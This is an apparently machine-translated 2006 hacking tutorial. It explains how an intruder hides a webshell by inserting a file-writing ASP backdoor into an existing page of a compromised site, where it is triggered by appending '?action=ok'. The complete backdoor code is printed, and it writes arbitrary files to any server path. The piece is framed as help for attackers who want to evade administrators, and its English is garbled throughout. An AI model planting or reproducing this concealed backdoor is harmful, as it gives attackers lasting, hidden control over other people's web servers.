Covert insertion-type ASP-Trojan-vulnerability warning-the black bar safety net

2006-03-11T00:00:00
ID MYHACK58:6220067833
Type myhack58
Reporter 佚名
Modified 2006-03-11T00:00:00

Description

Get website the webshell, if the administrator found, then your horse is useless, deleted! Administrators are also not are exists to eat, so we have to hide our WEBSHELL, the following is about ASP insert-Trojan several the use of method is not easy to be found~~~Oh I got a webshell to everyone to do the demo: well, we just find the one you want to play tricks in the ASP file 1. In our to tricks of the ASP file added the following contents <% if request(action)=ok then %> ################################## <% end if %> in#########################added at your shell code is the code I have provided as newmm. asp Trojan (encrypted code): everyone is familiar with it, my previous tutorial to do the analyzing. <% if request(action)=ok then %> <%dim objFSO%> <%dim fdata%> <%dim objCountFile%> <%on error resume next%> <%Set objFSO = Server. CreateObject(Scripting. The FileSystemObject)%> <%if Trim(request(syfdpath))<> then%> <%fdata = request(cyfddata)%> <%Set objCountFile=objFSO. CreateTextFile(request(syfdpath),True)%> <%objCountFile. Write fdata%> <%if err =0 then%> <%response. write <font color=red>save Success!& lt;/font>%> <%else%> <%response. write <font color=red>Save UnSuccess!& lt;/font>%> <%end if%> <%err. clear%> <%end if%> <%objCountFile. Close%> <%Set objCountFile=Nothing%> <%Set objFSO = Nothing%> <%Response. write <form action= method=post>%> <%Response. write to save the file<font color=red>the absolute path(including the file name:D:\web\x. asp):</font>%> <%Response. Write <input type=text name=syfdpath width=3 2 size=5 0>%> <%Response. Write <br>%> <%Response. write this document absolute path%> <%=server. mappath(Request. ServerVariables(SCRIPT_NAME))%> <%Response. write <br>%> <%Response. write the contents of the input:%> <%Response. write <textarea name=cyfddata cols=8 0 rows=1 0 width=3 2></textarea>%> <%Response. write <input type=submit value=save>%> <%Response. write </form>%> <% end if%> added later without affecting the normal browser LAN access when you do the hands and feet of the ASP files back plus? action=ok example:index. asp? action=ok you can tune out the shell, does not affect the normal browser embrace everyone you see, Oh